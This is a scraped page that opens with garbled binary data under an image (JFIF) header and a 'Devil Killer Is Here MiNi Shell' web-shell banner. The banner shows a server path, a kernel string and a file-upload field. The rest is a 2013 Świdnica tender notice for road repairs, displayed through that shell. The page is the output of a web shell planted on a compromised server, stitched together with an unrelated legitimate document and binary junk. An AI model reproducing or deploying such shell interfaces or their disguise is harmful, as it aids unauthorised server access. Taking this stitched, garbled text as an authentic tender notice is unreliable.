JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130409/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130409/138000-N-2013.html

<p class="kh_header"><b>Świdnica: Wykonanie robót budowlanych pn. Remont dróg gminnych o  nawierzchni bitumicznej i gruntowej ulepszonej będących w zarządzie Prezydenta Miasta Świdnicy w latach 2013 - 2016</b><br>
<b>Numer ogłoszenia: 138000 - 2013; data zamieszczenia: 09.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Świdnicy , ul. Armii Krajowej 49, 58-100 Świdnica, woj. dolnośląskie, tel. 074 8562850, faks 074 8523110.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swidnica.bip-gov.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót budowlanych pn. Remont dróg gminnych o  nawierzchni bitumicznej i gruntowej ulepszonej będących w zarządzie Prezydenta Miasta Świdnicy w latach 2013 - 2016.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA
3.1. Lokalizacja-  infrastruktura drogowa, stanowiąca drogi gminne (jezdnie, place, parkingi, chodniki) zlokalizowana w granicach administracyjnych  m. Świdnica.
Zadanie obejmuje roboty budowlane obejmujące 
3.2. Opis przedmiotu i cel zamówienia
Przedmiotem zamówienia jest - remont dróg  gminnych  o nawierzchni bitumicznej i gruntowej ulepszonej  w granicach administracyjnych m .Świdnicy
Cel - Celem postępowania przetargowego jest wyłonienie wykonawcy na wykonanie zadania remontowego.
3.2.1 Przedmiot zamówienia 
a) remont  istniejącej nawierzchni bitumicznej wybranego elementu pasa drogowego w celu likwidacji ubytków lub deformacji i doprowadzenia nawierzchni do stanu pierwotnego.
b) wykonanie remontów ulic o nawierzchni gruntowej ulepszonej .
c) oznakowanie uszkodzonych  elementów infrastruktury drogowej do czasu właściwej naprawy  miejsc,  gdzie  uszkodzenie powstało w sposób nagły.
Uwaga: wymaga się podjęcia działań, o których mowa w  pkt. C, w ciągu dwóch  godzin  od telefonicznego zgłoszenia. 
3.2.2 Specyfikacje techniczne wykonania i odbioru robót stanowią załącznik do niniejszej specyfikacji znajdują się na stronie internetowej Zamawiającego www.swidnica.bip-gov.info.w katalogu zamówienia publiczne. 
3.2.3  Wykonawca robót jest zobowiązany do czasu podpisania umowy  przedłożyć zatwierdzony projekt organizacji ruchu  dla robót postępujących  tj:
a) oznakowanie tymczasowe na czas remontu cząstkowego nawierzchni ulicy lub  chodnika,
b) oznakowanie  tymczasowe na czas  robót związanych z wyrównaniem nawierzchni gruntowych ulepszonych, 
c) oznakowanie  tymczasowe miejsc gdzie uszkodzenie powstało w sposób nagły,  
3.3. Zakres robót 
3.3.1 W zakresie zadania ujęto wykonanie robót budowlanych zakwalifikowanych wg Wspólnego Słownika Za  mówień do kategorii (kody CPV): 
45.23.31.40-2 Roboty drogowe w katalogu zamówienia publiczne, główny przedmiot 45.23.31.40.2
45233142-6 Roboty w zakresie naprawy dróg
45233223-8 Wymiana nawierzchni drogowej
45233141-9 Roboty w zakresie konserwacji dróg
45233200-1 Roboty w zakresie różnych nawierzchni
3.3.2 Obejmuje roboty budowlane na które składają się:
a) przy wykonywaniu remontów cząstkowych  masą mineralno- asfaltową grubości co najmniej  5 cm 
- obciąć piłą do asfaltu krawędź nawierzchni min. 3 cm od brzegu uszkodzenia
- odspoić, zebrać i wywieść rumosz z pasa drogowego na wysypisko  i ponieść opłaty za korzystanie  z wysypiska
- oczyścić i osuszyć  remontowaną powierzchnię z zanieczyszczeń 
- skropić krawędzie (od czoła) i dno  uszkodzenia lepiszczem
- wypełnić i zagęścić remontowaną powierzchnię masą mineralno asfaltową gr. 5 cm 
b) przy wykonywaniu remontów cząstkowych  masą mineralno- asfaltową grubości za każdy  +-1 cm 
- obciąć piłą do asfaltu krawędź nawierzchni min. 3 cm od brzegu uszkodzenia
- odspoić, zebrać i wywieść rumosz z pasa drogowego na wysypisko  i ponieść opłaty za korzystanie  z wysypiska
- oczyścić i osuszyć remontowaną powierzchnię z zanieczyszczeń 
- skropić krawędzie (od czoła) i dno  uszkodzenia lepiszczem
- wypełnić i zagęścić remontowaną powierzchnię masą mineralno-asfaltową gr. +-1  cm
c) przy wykonywaniu remontu nawierzchni gruntowych i tłuczniowych, bez zmiany wysokości niwelety  należy :
- spulchnić na gł.  ok. 15-20 cm oraz   wyprofilować nawierzchnię przy użyciu równiarki  celem uzyska-nia spadków poprzecznych i podłużnych,
- rozłożyć materiał kamienny zebrany w wyniku wyrównywania nawierzchni pasa drogowego o średniej grubości 15 -20 cm 
- zagęścić rozłożony materiał przy użyciu  walca stycznego  o ciężarze 10 -15 ton  oraz usunąć nad-miar materiału
d) przy wykonywaniu remontu nawierzchni gruntowych i tłuczniowych  wraz z uzupełnieniem  klińcem kamiennym  o uziarnieniu 4 -31,5 mm , bez zmiany wysokości niwelety należy :
- spulchnić na gł. ok. 15-20 cm oraz  wyprofilować nawierzchnię przy użyciu równiarki  celem uzyskania spadków poprzecznych  i    podłużnych, 
- rozłożyć i wyrównać dowieziony materiał   w ilości  do 30 % ogólnej powierzchni,  
- zagęścić rozłożony materiał przy użyciu  walca stycznego  o cieżarze10 -15 ton  oraz usunąć nadmiar materiału
e) przy wykonywaniu remontów cząstkowych masą mineralno- asfaltową bez cięcia i kucia nawierzchni
- osuszyć i oczyścić remontowaną powierzchnię z zanieczyszczeń 
- skropić krawędzie (od czoła) oraz miejsca połączeń  z istniejącą powierzchnią lepiszczem (emulsja asfaltowa, asfalt).
- wypełnić i zagęścić remontowaną powierzchnię masą mineralno-asfaltową gr. 5 cm 
f) przy wykonywaniu  remontów  cząstkowych   przy ubytkach do 2 cm specjalistyczną maszyną wtry-skującą pod ciśnieniem grysami  i emulsją  asfaltową typu K1 - 65  tj.
- miejscowe oczyszczenie nawierzchni 
- skropienie emulsją asfaltową kationową  szybkorozkładową K1 - 65  uszkodzonych miejsc nawierzch-ni  rozpryskanie pod ciśnieniem grysów bazaltowych (płukanych) o uziarnieniu 2-5 mm w ilości   25 - 30 kg/m2    
- usuniecie,  zebranie nadmiaru i niezwiązanych ziaren kruszywa  w okresie nie dłuższym niż 48 godzin poprzez zamiecenie i wywóz  na wysypisko,
g) przy wykonywaniu remontu miejsc przełomowych tj. 
- demontaż istniejącej nawierzchni o średniej grubości  8 cm 
- wykonanie robót ziemnych na głębokość 50 cm wraz  z wywozem urobku
- rozłożenie stabilizacji betonowej  Rm 2,5 MP z wytwórni  gr. 20 cm, 
- wykonanie podbudowy z kruszywa łamanego o uziarnieniu  63 mm gr. 28 cm 
- ułożenie warstwy wiążącej nawierzchni z masy mineralno-asfaltowej  gr. 5 cm 
- ułożenie warstwy ścieralnej nawierzchni z masy mineralno-asfaltowej gr. 5 cm 
3.3.3. Zakres prac wyszczególniony w pkt.3.2.1 c obejmuje: 
a) oznakowanie zgodnie z projektem określonym w pkt. 3.2.3 c  miejsc gdzie uszkodzenie powstało w sposób nagły, w ciągu dwóch  godzin od telefonicznego zgłoszenia do Wykonawcy,
b) kontrolę i utrzymanie we właściwym stanie technicznym oznakowania,  o którym mowa w pkt. 3.3.3 a do czasu zakończenia tych prac,
c) przeprowadzenie  remontu elementów infrastruktury drogowej w ciągu 3 dni od daty zgłoszenia przez Zamawiającego, a w przypadku niekorzystnych warunków atmosferycznych z chwilą ich ustania.  
3.3.4 Podstawą realizacji zadań , o których mowa w pkt. 3.3.3 ppkt. a i b  jest informacja pozyskana przez Wykonawcę od Zamawiającego  lub przekazana za pośrednictwem Straży Miejskiej, Policji za pomo-cą fax-u , telefonicznego zgłoszenia lub e-mail.
WARUNKI WYKONYWANIA
4. WARUNKI WYKONYWANIA ROBÓT
4.1. Do sprawowania nadzoru  nad realizacją prac Zamawiający zapewnia nadzór  osoby z wymaganymi uprawnieniami.
4.2. Przedmiot zamówienia należy realizować zgodnie ze specyfikacją techniczną wykonania i odbioru robót,  zasadami sztuki budowlanej oraz zgodnie z zasadami BHP. 
4.3. Roboty budowlane powinny być wykonywane zgodnie z reżimem technologicznym, określonym przez Polskie Normy, producentów poszczególnych elementów, produktów, materiałów i urządzeń. Wszystkie użyte do budowy materiały powinny posiadać odpowiedni atest i świadectwo dopuszczenia, wydane przez odpowiednie uprawnione instytucje, zezwalające na stosowanie ich w budownictwie. Dokumenty te przed wbudowaniem materiałów należy przedłożyć osobie powołanej przez Zamawiającego do nadzoru.
4.4. Podstawa realizacji zadań , o których mowa w pkt. 3.2.3 ppkt c. jest informacja pozyskana przez Wykonawcę od Zamawiającego  lub przekazana za pośrednictwem Straży Miejskiej, Policji za pomocą fax-u, telefonicznego zgłoszenia lub e-mail.
4.5. Nakłady  nie stanowiące wartości robót budowlanych, a niezbędne do wykonania przedmiotu umowy należy objąć ceną ofertową.
4.6. Wykonawca jest odpowiedzialny za szkody powstałe w trakcie realizacji robót i po ich zakończeniu  również wobec osób trzecich  w wyniku nieterminowego naprawienia nawierzchni drogowych.
4.7. Wykonawca zapewni sprawowanie kierownictwa budowy i robót przez osoby posiadające odpowiednie kwalifikacje zawodowe i uprawnienia do kierowania robotami budowlanymi w odpowiednich specjalnościach, zgodnie z wymogami Prawa Budowlanego.
4.8. Wykonawca zobowiązany jest do realizacji zadań z należytą starannością i bez opóźnienia, aby ukończyć roboty w terminie ustalonym w harmonogramie lub protokole typowania robót.
4.9. Wykonawca własnym staraniem zabezpieczy wywóz gruzu (rumoszu) z terenu budowy, co stanowić będzie jego koszt. 
4.10. Zamawiający dopuszcza realizację zamówienia w systemie podwykonawczym. 
5. WARUNKI ODBIORU ROBÓT
5.1 Wykonawca na wniosek Zamawiającego zobowiązany jest  do uczestniczenia w przeglądach  stanu technicznego infrastruktury drogowej. Na jego podstawie  wspólnie spisany zostanie protokół typowania robót  z określonym zakresem  prac, terminem  ich rozpoczęcia i zakończenia.
5.2 Wykonawca w trakcie realizacji zadań określonych w protokole typowania zobowiązany jest do telefonicznego powiadamiania Zamawiającego  (do godz. 9oo.) o miejscu prowadzenia robót remontowych w danym dniu.
5.3 Wykonawca zobowiązany jest do powiadomienia Zamawiającego w przypadku kiedy nie wykonuje tego dnia robót, a ma niezrealizowane zadania objęte protokołem typowania.
5.4 Wraz z  podpisaniem przyjęcia protokołu typowania  Wykonawca ponosi pełną odpowiedzialność za wszelkie zdarzenia wynikające ze stanu nawierzchni. 
5.5 Odbiory robót będą  dokonywane przez Zamawiającego w ciągu 10 dni  od daty zgłoszenia przez Wykonawcę  gotowości robót do odbioru. 
5.6 Podstawą  do odbioru będą: oględziny nawierzchni, badania laboratoryjne  i techniczne, pomiary geometryczne.
Badania laboratoryjne  mieszanek bitumicznych  powinny być wykonywane przez laboratorium, nie rzadziej niż raz na 50 Mg wbudowanej masy, a protokoły przekazane Zamawiającemu.
5.7 Do każdego protokołu   odbioru  w miarę postępu robót dołączony będzie kosztorys zamienny wynikający z rzeczywiście wykonanych robót ( potwierdzony przez inspektora nadzoru) i  cen jednostkowych stanowiących Załącznik nr 1 do Umowy.
5.8 Zamawiający może naliczać kary w przypadku nie wykonania lub nienależytego wykonania robót:
5.8.1 Za każdy dzień opóźnienia zakończenia robót, określonego w protokole typowania  robót w wysokości 200 zł.
5.8.2 W przypadku nie wykonania postanowień pkt. 3.3.3 kara w wysokości 100 zł za każdy dzień przedłużenia terminu, a w przypadku powstania szkody w majątku Zamawiającego lub osób trzecich, Wykonawca poniesie z tego tytułu pełną odpowiedzialność.
6 WYMAGANY TERMIN WYKONANIA ZAMÓWIENIA:
Terminy wykonania zamówienia 
- rozpoczęcie - w dniu podpisania umowy 
- zakończenie-  31.12.2016
 Okres gwarancji na prace:
- 1 rok  na remonty  masą mineralną asfaltową( objętych protokołem typowania robót)
- 10 miesięcy na remonty nawierzchni gruntowych ulepszonych (objętych protokołem typowania robót)
- 1 rok  na powierzchniowe utrwalanie nawierzchni (objętych protokołem typowania robót)
- 3  lata na remonty nawierzchni (objęte harmonogramem robót)
Termin realizacji przedmiotu zamówienia oraz udzielonej gwarancji nie jest kryterium oceny oferty,  jest natomiast jej warunkiem.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1. Zamawiający w oparciu o art. 67 ust 1 pkt. 5 ustawy prawo zamówień publicznych przewiduje w okresie 3 lat od podpisania umowy udzielenie zamówienia dodatkowego stanowiącego nie więcej niż 50 % zamówienia podstawowego.
2. Zamawiający w oparciu o art. 67 ust. 1 pkt. 6 ustawy prawo zamówień publicznych przewiduje  w okresie 3 lat możliwość udzielenia zamówień uzupełniających, stanowiących nie więcej niż  50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.31.42-6, 45.23.32.23-8, 45.23.31.41-9, 45.23.32.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> WYMAGANIA DOTYCZĄCE WADIUM
12.1 Oferta powinna być zabezpieczona wadium w wysokości: 40.000,00 zł (słownie: czterdzieści  tysięcy złotych 00/100).Wadium winno zostać wniesione przed upływem terminu składania ofert, tj. przed 24-04-2013 r. godz. 09:00.
12.2 Wadium może być wniesione w formach określonych w art.45 ust.6 ustawy Prawo Zamówień Publicznych, z tym, że:
a. złożone w pieniądzu: przelewem na rachunek bankowy Zamawiającego w Banku PKO. S.A. I Oddział w Świdnicy 96 1240 1978 1111 0010 0166 5724. Kwota wadium wniesiona przelewem winna znaleźć się na rachunku bankowym Zamawiającego przed upływem terminu składania ofert.
b. złożone w gwarancjach (bankowych, ubezpieczeniowych): z treści gwarancji winno wynikać bezwarunkowo, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych art. 46 ust. 5 ustawy PZP tj. w przypadku, gdy Wykonawca:
- odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofer-cie,
- nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
- zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po  stronie  Wykonawcy,
- w odpowiedzi na wezwanie o którym mowa w art.26 ust.3, nie złożył dokumentów lub oświadczeń, o których mowa w art.25 ust.1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn niele-żących po jego stronie,
c. złożone w innej niż pieniądz formie winno być złożone w kasie Zamawiającego jako depozyt, złożony za potwierdzeniem, przed upływem terminu składania ofert. 
d. w przypadku złożenia wadium w formie innej niż pieniądz, dokument gwarancji poręczenia wadialnego winien pod rygorem odrzucenia oferty wskazywać wszystkie podmioty wspólnie ubiegające się o udzielenie zamówienia w rozumieniu art. 23 ustawy PZP.
12.3 Do oferty należy dołączyć potwierdzenia realizacji przelewu lub oryginał złożenia depozytu.
12.4 Wszystkie formy wadium powinny mieć określoną ważność zgodną z okresem związania ofertą. 
Bieg terminu związania ofertą rozpoczyna się wraz z upływem terminu składania ofert.
12.5 Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana, jako najkorzystniejsza, z zastrzeżeniem jak w pkt. 12.8.
12.6 Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
12.7 Zamawiający zwraca wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
12.8 Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a. odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b. nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c. zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,
d. w odpowiedzi na wezwanie, o którym mowa w art.26 ust.3, nie złożył dokumentów lub oświadczeń, o których mowa w art.25 ust.1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że w okresie ostatnich trzech  lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał roboty tożsame z przedmiotem zamówienia o wartości robót nie mniejszej niż 3.000.000  zł brutto łącznie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że dysponuje sprzętem niezbędnym do realizacji przedmiotu umowy. Minimum sprzętowe to:
- skrapiarka   samojezdna do bitumu  co najmniej 5000 dm 3 - 1 szt.
- walec stalowy gładki średni 10 t - 1 szt.
- walec stalowy gładki ciężki  15 t - 1 szt.
- walec statyczny wibracyjny ogumiony  15 t - 1 szt.
- walec chodnikowy - 1 szt.
- zagęszczarka -  1 szt.
- stopa wibracyjna - 1 szt.
- równiarka do nawierzchni gruntowych 88kW/120 KM) - 1 szt.
- piła do ciecia asfaltu, betonu - 1 szt.
- frezarka do nawierzchni bitumicznych - 1 szt.
- recykler -  1 szt.
- szczotka mechaniczna -  1 szt.
- urządzenie do ogrzewania i osuszania remontowanych miejsc -  1 szt. 
Ww. wykaz winien zawierać: nazwę sprzętu, rok budowy, określenie stanu technicznego (w % zuży-cia) i podstawowych cech eksploatacyjnych wraz z informacją o podstawie dysponowania tymi zaso-bami (własność najem, dzierżawa, użyczenie)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że dysponuje lub dysponować będzie osobą, która będzie uczestniczyć w wykonaniu zamówienia, posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń, oraz min. 2 letnie doświadczenie w kierowaniu tymi robotami. Wykonawca obowiązany jest  podać  informację  o podstawie do dysponowania tą  osobą;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że posiada środki finansowe lub zdolność kredytową w wysokości min 500.000,00 zł (pięćset złotych) oraz wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą jak: 200.000,00 zł ( dwieście tysięcy złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">inne dokumenty dotyczące sytuacji ekonomicznej i finansowej:<br>Jeżeli wykonawca będzie polegał na zdolności ekonomiczno- finansowej  podmiotów trzecich, do oferty  należy dołączyć  oświadczenie o solidarnej odpowiedzialności za realizacje zadania Wykonawcy i tych podmiotów ( art. 369 k.c.);</li>

</ul>
